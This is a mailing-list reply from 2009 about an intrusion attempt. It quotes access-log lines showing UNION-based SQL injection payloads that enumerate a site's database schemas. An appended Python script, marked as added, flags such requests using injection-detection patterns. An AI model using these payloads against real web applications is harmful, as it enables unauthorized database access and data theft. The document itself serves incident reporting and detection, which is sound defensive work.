On Thu, Jul 30, 2009 at 01:54:22AM +0000, Arief Yudhawarman wrote:
>
> He was trying to log in as the users dhan and leqhi.
> According to whois, the IP 114.58.x.x is an Indosat IP, while 70.84.178.x
> belongs to theplanet. Should this be reported to the responsible party (Indosat) or not?
> I have never experienced this before, so I don't know the standard procedure yet.

In addition, there are many SQL injection attacks in /var/log/htdocs/*access.log coming from the Indosat IP above.

114.58.53.4 - - [21/Jul/2009:15:22:32 +0700] "GET /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 6368656d61+LIMIT+1,1-- HTTP/1.1" 200 4716
114.58.53.4 - - [21/Jul/2009:15:22:33 +0700] "GET /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 6368656d61+LIMIT+2,1-- HTTP/1.1" 200 4714
114.58.53.4 - - [21/Jul/2009:15:22:34 +0700] "GET /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 6368656d61+LIMIT+3,1-- HTTP/1.1" 200 4724
114.58.53.4 - - [21/Jul/2009:15:22:35 +0700] "GET /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 6368656d61+LIMIT+4,1-- HTTP/1.1" 200 4712
114.58.53.4 - - [21/Jul/2009:15:22:36 +0700] "GET /iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73 6368656d61+LIMIT+5,1-- HTTP/1.1" 200 4717

It looks like I need to patch the kernel with connection limiting for iptables.

--
Thanks in advance.

Regards,
~~ Arief Yudhawarman ~~
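
Added example, not part of the original message: one way to triage an access log like the one quoted above, flagging requests whose decoded query string carries at least two SQL injection markers and noting sources that step through consecutive LIMIT offsets. The log lines, paths and IP addresses in it are constructed, and the function and signal names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in Apache access-log format (documentation IPs, hypothetical paths).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Jul/2009:15:22:32 +0700] "GET /site/news/detail.php?id=2+AND+1=2+UNION+SELECT+0,schema_name,2+FROM+information_schema.schemata+LIMIT+1,1-- HTTP/1.1" 200 4716
192.0.2.10 - - [21/Jul/2009:15:22:33 +0700] "GET /site/news/detail.php?id=2+AND+1=2+UNION+SELECT+0,schema_name,2+FROM+information_schema.schemata+LIMIT+2,1-- HTTP/1.1" 200 4714
192.0.2.10 - - [21/Jul/2009:15:22:34 +0700] "GET /site/news/detail.php?id=2+AND+1=2+UNION%20SELECT+0,schema_name,2+FROM+information_schema.schemata+LIMIT+3,1-- HTTP/1.1" 200 4724
198.51.100.7 - - [21/Jul/2009:15:23:01 +0700] "GET /site/news/detail.php?id=7 HTTP/1.1" 200 5120
198.51.100.7 - - [21/Jul/2009:15:23:05 +0700] "GET /site/search.php?q=student+union+select+committee HTTP/1.1" 200 2290
"""

# Tolerates spaces inside the URL, which wrapped or mangled log lines can contain.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3})')
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "comment_terminator": re.compile(r"(--|#|/\*)\s*$"),
}
LIMIT_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*\d+", re.I)

def analyze(log_text, min_signals=2):
    """Group suspicious requests by source IP; one signal alone is treated as noise."""
    report = defaultdict(lambda: {"hits": 0, "signals": set(), "limit_offsets": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line
        ip, _method, url, _status = m.groups()
        query = unquote_plus(url.partition("?")[2])  # decode '+' and %xx before matching
        matched = {name for name, rx in SIGNALS.items() if rx.search(query)}
        if len(matched) < min_signals:
            continue
        entry = report[ip]
        entry["hits"] += 1
        entry["signals"] |= matched
        lim = LIMIT_RE.search(query)
        if lim:
            entry["limit_offsets"].append(int(lim.group(1)))
    for entry in report.values():
        offs = entry["limit_offsets"]
        # Row-by-row extraction shows up as offsets increasing by one per request.
        entry["enumerating"] = len(offs) >= 3 and all(b == a + 1 for a, b in zip(offs, offs[1:]))
    return dict(report)

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["signals"]), "enumerating:", info["enumerating"])
```

A 200 status on every flagged request, as in the quoted log, means the injectable parameter itself still needs fixing in the application; connection limiting only slows the requests down.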